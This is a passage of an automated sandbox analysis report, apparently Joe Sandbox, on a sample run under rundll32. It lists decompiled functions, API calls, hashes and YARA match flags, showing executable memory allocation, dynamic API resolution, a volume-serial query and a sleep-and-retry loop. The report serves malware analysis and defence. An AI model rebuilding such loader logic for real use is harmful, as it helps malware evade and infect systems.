                                            • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                            • Instruction Fuzzy Hash: B491A675A00109DFCB58CF88D590EAEB7B6BF88304F248159E815AB342D735EA52CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00182054, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00181968: RtlInitializeCriticalSection.KERNEL32(001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 0018197E
                                              • Part of subcall function 00181968: RtlEnterCriticalSection.KERNEL32(001945C4,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181991
                                              • Part of subcall function 00181968: LocalAlloc.KERNEL32(00000000,00000FF8,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 001819BB
                                              • Part of subcall function 00181968: RtlLeaveCriticalSection.KERNEL32(001945C4,00181A25,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181A18
                                            • RtlEnterCriticalSection.KERNEL32(001945C4,00000000,001821D0), ref: 0018209F
                                            • RtlLeaveCriticalSection.KERNEL32(001945C4,001821D7), ref: 001821CA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                            • String ID:
                                            • API String ID: 2227675388-0
                                            • Opcode ID: 7d7d36cae804c6dd8f6ff24588f86a192bf3029c8be30177870f56b1e57ede66
                                            • Instruction ID: fd64aeadec75c03b5c1b9a0e1c50a180f1a13853ce2008437e8fc4db92aa2a55
                                            • Opcode Fuzzy Hash: 7d7d36cae804c6dd8f6ff24588f86a192bf3029c8be30177870f56b1e57ede66
                                            • Instruction Fuzzy Hash: C841E6F2A003009FE716EF68DC91A29B7E0FB5A314B25426EE501C7B91E3349A83CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 000C6B20, Relevance: 3.1, APIs: 2, Instructions: 77libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 000C6B7B
                                            • GetProcAddress.KERNEL32(?,?), ref: 000C6BDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID:
                                            • API String ID: 2574300362-0
                                            • Opcode ID: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                                            • Instruction ID: 29e4262945f0e324affaa6c9bb33e0223f505207055bb443284629349d42c06f
                                            • Opcode Fuzzy Hash: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                                            • Instruction Fuzzy Hash: 78317574A00209EFCB54CF98C891BADB7B5FF88314F2482A9D819AB355D735AE41CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 000C6820, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000C68A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: VirtualAlloc
                                            • API String ID: 4275171209-164498762
                                            • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                            • Instruction ID: d6657c45591269730d858894e2b42e3aaa0f1aefe7a5c3ead97337a18d12b77d
                                            • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                            • Instruction Fuzzy Hash: B2110D60D08289EAEF11D7E89409BFEBFB55B11704F044098E5846A282D6BB57588BA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2490, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C2490() {
				int _v8;
				long _v12;
				char _v272;
				int _t13;
				void* _t18;

				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
				if(_v8 == 0) {
					L3:
					return 0;
				}
				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
				if(_t13 == 0) {
					goto L3;
				}
				return _v12;
			}








                                            0x001c24ab
                                            0x001c24b2
                                            0x001c24ea
                                            0x00000000
                                            0x001c24ea
                                            0x001c24bc
                                            0x001c24db
                                            0x001c24e3
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001C24A5
                                            • GetVolumeInformationA.KERNEL32 ref: 001C24DB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DirectoryInformationVolumeWindows
                                            • String ID:
                                            • API String ID: 3487004747-0
                                            • Opcode ID: 4d2cecf6854b3408e60b543273b63d144c9a35253e2d70c2466d008c08fd4e1c
                                            • Instruction ID: ae7718f665d170f5e7b7108dc4c30a1733cf7e5d53aa8c41248340aded1433fa
                                            • Opcode Fuzzy Hash: 4d2cecf6854b3408e60b543273b63d144c9a35253e2d70c2466d008c08fd4e1c
                                            • Instruction Fuzzy Hash: 9CF05430A44308ABE734DB64DC15FD9BB789711700F1041A8EA45E61C0D7F4AA84CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C1870, Relevance: 2.6, APIs: 2, Instructions: 85sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E001C1870(void* __eflags) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				void* _t38;
				void* _t40;
				void* _t52;
				void* _t55;

				_v12 = 0x100000;
				_t28 = E001C1390(_v12); // executed
				_v20 = _t28;
				_t29 = E001C1390(_v12); // executed
				_v24 = _t29;
				_t30 = E001C1390(0x1000); // executed
				_t55 = _t52 + 0xc;
				_v8 = _t30;
				_v32 = 1;
				while(1) {
					_t58 = _v32 - 1;
					if(_v32 != 1) {
						break;
					}
					_t32 = E001C1AA0( &_v36, _t58, _v20, _v12,  &_v36); // executed
					_t55 = _t55 + 0xc;
					if(_t32 != 1) {
						L12:
						Sleep(0xea60); // executed
						_t30 = E001C15C0(); // executed
						Sleep(0xea60); // executed
						continue;
					}
					_t35 = E001C1560(_v20 + 4, _v24);
					_t55 = _t55 + 8;
					_v36 = _t35;
					_v16 = _v24;
					while(1 != 0) {
						_v16 = E001C17B0(_v16, _v16, _v8);
						_t38 = E001C27B0(_v16, _v8);
						_t55 = _t55 + 0xc;
						if(_t38 == 1) {
							_v28 = 0;
							_t46 = _v8;
							_t40 = E001C1630(_v8, _v8,  &_v28); // executed
							_t55 = _t55 + 8;
							if(_t40 == 1 && _v28 == 0) {
								E001C14E0(_t46, _v8);
								_t55 = _t55 + 4;
							}
						}
						if(_v16 != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L12;
				}
				return _t30;
			}




















                                            0x001c1876
                                            0x001c1881
                                            0x001c1889
                                            0x001c1890
                                            0x001c1898
                                            0x001c18a0
                                            0x001c18a5
                                            0x001c18a8
                                            0x001c18ab
                                            0x001c18b2
                                            0x001c18b2
                                            0x001c18b6
                                            0x00000000
                                            0x00000000
                                            0x001c18c8
                                            0x001c18cd
                                            0x001c18d3
                                            0x001c195a
                                            0x001c195f
                                            0x001c1965
                                            0x001c196f
                                            0x00000000
                                            0x001c196f
                                            0x001c18e4
                                            0x001c18e9
                                            0x001c18ec
                                            0x001c18f2
                                            0x001c18f5
                                            0x001c190e
                                            0x001c1915
                                            0x001c191a
                                            0x001c1920
                                            0x001c1922
                                            0x001c192d
                                            0x001c1931
                                            0x001c1936
                                            0x001c193c
                                            0x001c1948
                                            0x001c194d
                                            0x001c194d
                                            0x001c193c
                                            0x001c1954
                                            0x00000000
                                            0x001c1956
                                            0x00000000
                                            0x001c1956
                                            0x001c1954
                                            0x00000000
                                            0x001c18f5
                                            0x001c197d

                                            APIs
                                              • Part of subcall function 001C1390: GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                              • Part of subcall function 001C1390: RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                              • Part of subcall function 001C1AA0: GetVersion.KERNEL32(?,001C18CD,?,00100000,?), ref: 001C1AAD
                                              • Part of subcall function 001C1AA0: wsprintfA.USER32 ref: 001C1B5E
                                            • Sleep.KERNEL32(0000EA60), ref: 001C195F
                                            • Sleep.KERNEL32(0000EA60), ref: 001C196F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapSleep$AllocateProcessVersionwsprintf
                                            • String ID:
                                            • API String ID: 1739176888-0
                                            • Opcode ID: d6b587cb950cbe4129278523491e0f42a845808760b4987bbda89357ba74660e
                                            • Instruction ID: 53bcb3f88be8e44e636f719d721bddcb10bfba97eae63fae8e27f6f4161ea4af
                                            • Opcode Fuzzy Hash: d6b587cb950cbe4129278523491e0f42a845808760b4987bbda89357ba74660e
                                            • Instruction Fuzzy Hash: 6B3181B5D40209BBDF10DBD4D852FAEB778BF7A308F14452CE50AB6242E735DA448B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00181480, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00181480(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00181334(0x1945e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                            0x00181483
                                            0x0018148d
                                            0x0018149c
                                            0x0018148f
                                            0x0018148f
                                            0x0018148f
                                            0x001814a2
                                            0x001814af
                                            0x001814b4
                                            0x001814b6
                                            0x001814ba
                                            0x001814c3
                                            0x001814ca
                                            0x001814d6
                                            0x001814dd
                                            0x00000000
                                            0x001814dd
                                            0x001814ca
                                            0x001814e2

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00181789), ref: 001814AF
                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00181789), ref: 001814D6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 14aa39a322f48f03e6ebc4bc4b7e4328b9ae93e5cb59381289912d88427ff9d6
                                            • Instruction ID: 038664f1c52f34b431cfae2afcba5726ef8fed4ea16560b08cd8b5ad380a0cf4
                                            • Opcode Fuzzy Hash: 14aa39a322f48f03e6ebc4bc4b7e4328b9ae93e5cb59381289912d88427ff9d6
                                            • Instruction Fuzzy Hash: E8F08273A006207BEB307A6A4C85F52668A9F957A0F154171BA0CEF3C9D7618D034BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00185298, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00185298(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00183B78(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00184840( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00183A70(_t21, _t13, _t22);
				}
				return __eax;
			}






                                            0x001852a0
                                            0x001852a6
                                            0x001852af
                                            0x00000000
                                            0x001852e0
                                            0x001852c9
                                            0x00000000
                                            0x001852d4
                                            0x001852ed

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: LoadString
                                            • String ID:
                                            • API String ID: 2948472770-0
                                            • Opcode ID: 708a8b2df4ea6c41cdd60a99455ff971cd36803135797d657e3058d62c6a7319
                                            • Instruction ID: abe65c205d79b820b5ebc17fe67267844db4ede6ee07847295ece15677b0a625
                                            • Opcode Fuzzy Hash: 708a8b2df4ea6c41cdd60a99455ff971cd36803135797d657e3058d62c6a7319
                                            • Instruction Fuzzy Hash: 8AF030B17105109BCB00FA9CC8D2B5A73D9AB59705F188061B658DB356DF70DE058B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001847F8, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001847F8(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x180000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00184A34(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x180000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








                                            0x00184800
                                            0x00184806
                                            0x00184812
                                            0x00184816
                                            0x0018481f
                                            0x00184824
                                            0x00184826
                                            0x0018482b
                                            0x0018482d
                                            0x00184830
                                            0x00184830
                                            0x0018482b
                                            0x0018483e

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00184816
                                              • Part of subcall function 00184A34: GetModuleFileNameA.KERNEL32(00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A50
                                              • Part of subcall function 00184A34: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A6E
                                              • Part of subcall function 00184A34: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A8C
                                              • Part of subcall function 00184A34: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00184AAA
                                              • Part of subcall function 00184A34: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00184AF3
                                              • Part of subcall function 00184A34: RegQueryValueExA.ADVAPI32(?,00184CA0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001), ref: 00184B11
                                              • Part of subcall function 00184A34: RegCloseKey.ADVAPI32(?,00184B40,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00184B33
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Open$FileModuleNameQueryValue$Close
                                            • String ID:
                                            • API String ID: 2796650324-0
                                            • Opcode ID: b6b7299d0514e830f97bb4106cf1170470194b70054758366a670915ed80ae09
                                            • Instruction ID: 81b8c47d04d143abc81caabaabe73a65ef7c1e363347f332c05d8ac40ed6c69b
                                            • Opcode Fuzzy Hash: b6b7299d0514e830f97bb4106cf1170470194b70054758366a670915ed80ae09
                                            • Instruction Fuzzy Hash: DCE06D71A002119BCB10EEA8C8C1A4633D8AF18750F400965ED54CF24AD7B0DE108BD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00181614, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00181614(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x1945e4; // 0x3d8cdc
				while(_t29 != 0x1945e4) {
					_t7 = _t29 + 8; // 0x1fd0000
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x100000
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                            0x0018161b
                                            0x0018161f
                                            0x00181626
                                            0x0018163b
                                            0x00181643
                                            0x00181649
                                            0x0018164f
                                            0x00181652
                                            0x00181696
                                            0x0018165a
                                            0x0018165a
                                            0x0018165d
                                            0x00181660
                                            0x00181664
                                            0x00181666
                                            0x00181666
                                            0x0018166c
                                            0x0018166e
                                            0x0018166e
                                            0x00181674
                                            0x00181681
                                            0x00181688
                                            0x0018168a
                                            0x00181690
                                            0x00000000
                                            0x00181690
                                            0x00181688
                                            0x00181694
                                            0x00181694
                                            0x001816a5

                                            APIs
                                            • VirtualAlloc.KERNEL32(01FD0000,?,00001000,00000004), ref: 00181681
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a49e65c2d1f5070f413158ba11d7eaee761102f1cf4fcd629ecdd64c7d3fb9c2
                                            • Instruction ID: 2ac55c0b501b8f6fca074859681f29dd9daa91eab86b128b2cd82b1dbf839ef4
                                            • Opcode Fuzzy Hash: a49e65c2d1f5070f413158ba11d7eaee761102f1cf4fcd629ecdd64c7d3fb9c2
                                            • Instruction Fuzzy Hash: 43117372A047016FC320AF19C980A6AB7EAEFD5750F2AC92CE5D857354E770AD418B41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C13D0, Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C13D0(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				if( *0x1c715c != 0) {
					_t5 =  *0x1c715c; // 0x390000
					_t4 = HeapFree(_t5, 0, _a4); // executed
					return _t4;
				}
				return _t2;
			}






                                            0x001c13da
                                            0x001c13e2
                                            0x001c13e9
                                            0x00000000
                                            0x001c13e9
                                            0x001c13f0

                                            APIs
                                            • HeapFree.KERNEL32(00390000,00000000,001C1D0D), ref: 001C13E9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: dbbeed3ac0bc3be5f5f94125f35ad52e9756d719671ceae83491f76ae0ec91de
                                            • Instruction ID: 75e42cfc598cfa7cdf920e758179dc813d2549441a9d561e563fa5195c823687
                                            • Opcode Fuzzy Hash: dbbeed3ac0bc3be5f5f94125f35ad52e9756d719671ceae83491f76ae0ec91de
                                            • Instruction Fuzzy Hash: 6CC01232188208ABD2089F85EC58FAA3BADA705315F084009B6084AAE0C7B5E8D0CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0018487C, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 60%
                                            			E0018487C(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				struct HINSTANCE__* _t37;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t82;
				struct HINSTANCE__* _t83;
				char* _t89;
				struct HINSTANCE__* _t90;
				char* _t92;
				void* _t93;
				char* _t94;
				void* _t95;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t37 = GetModuleHandleA("kernel32.dll");
				_t90 = _t37;
				if(_t90 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t92 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t94 = E00184868(_v8 + 2);
							if( *_t94 != 0) {
								_t14 = _t94 + 1; // 0x1
								_t92 = E00184868(_t14);
								if( *_t92 != 0) {
									L10:
									_t82 = _t92 - _v8;
									_push(_t82 + 1);
									_push(_v8);
									_push( &_v595);
									L00181200();
									while( *_t92 != 0) {
										_t89 = E00184868(_t92 + 1);
										_t45 = _t89 - _t92;
										if(_t45 + _t82 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t92);
											_push( &(( &_v595)[_t82]));
											L00181200();
											_t93 = FindFirstFileA( &_v595,  &_v334);
											if(_t93 != 0xffffffff) {
												FindClose(_t93);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00181208();
												if(_t54 + _t82 + 1 + 1 <= 0x105) {
													 *((char*)(_t95 + _t82 - 0x24f)) = 0x5c;
													_push(0x105 - _t82 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t82]))[1]));
													L00181200();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00181208();
													_t82 = _t82 + _t64 + 1;
													_t92 = _t89;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00181200();
								}
							}
						}
					}
				} else {
					_push("GetLongPathNameA");
					_push(_t90);
					L001811D8();
					_t83 = _t37;
					if(_t83 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if(_t83->i() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00181200();
						}
					}
				}
				L17:
				return _v16;
			}




















                                            0x00184888
                                            0x0018488b
                                            0x00184891
                                            0x00184899
                                            0x0018489e
                                            0x001848a2
                                            0x001848e4
                                            0x001848ea
                                            0x00184927
                                            0x00000000
                                            0x001848ec
                                            0x001848f3
                                            0x00184904
                                            0x00184909
                                            0x0018490f
                                            0x00184917
                                            0x0018491c
                                            0x0018492a
                                            0x0018492c
                                            0x00184932
                                            0x00184936
                                            0x0018493d
                                            0x0018493e
                                            0x001849e9
                                            0x00184950
                                            0x00184954
                                            0x00184961
                                            0x00184968
                                            0x00184969
                                            0x00184972
                                            0x00184973
                                            0x0018498b
                                            0x00184990
                                            0x00184993
                                            0x00184998
                                            0x0018499e
                                            0x0018499f
                                            0x001849af
                                            0x001849b1
                                            0x001849c1
                                            0x001849c8
                                            0x001849d2
                                            0x001849d3
                                            0x001849d8
                                            0x001849de
                                            0x001849df
                                            0x001849e5
                                            0x001849e7
                                            0x00000000
                                            0x001849e7
                                            0x001849af
                                            0x00184990
                                            0x00000000
                                            0x00184961
                                            0x001849f5
                                            0x001849fc
                                            0x00184a00
                                            0x00184a01
                                            0x00184a01
                                            0x0018491c
                                            0x00184909
                                            0x001848f3
                                            0x001848a4
                                            0x001848a4
                                            0x001848a9
                                            0x001848aa
                                            0x001848af
                                            0x001848b3
                                            0x00000000
                                            0x001848b5
                                            0x001848b5
                                            0x001848c0
                                            0x001848c4
                                            0x001848c9
                                            0x00000000
                                            0x001848cb
                                            0x001848ce
                                            0x001848d5
                                            0x001848d9
                                            0x001848da
                                            0x001848da
                                            0x001848c9
                                            0x001848b3
                                            0x00184a06
                                            0x00184a0f

                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00184899
                                            • 7248FFF6.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 001848AA
                                            • lstrcpyn.KERNEL32(?,?,?,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 001848DA
                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 0018493E
                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001), ref: 00184973
                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39), ref: 00184986
                                            • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000), ref: 00184993
                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC), ref: 0018499F
                                            • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 001849D3
                                            • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 001849DF
                                            • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 00184A01
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
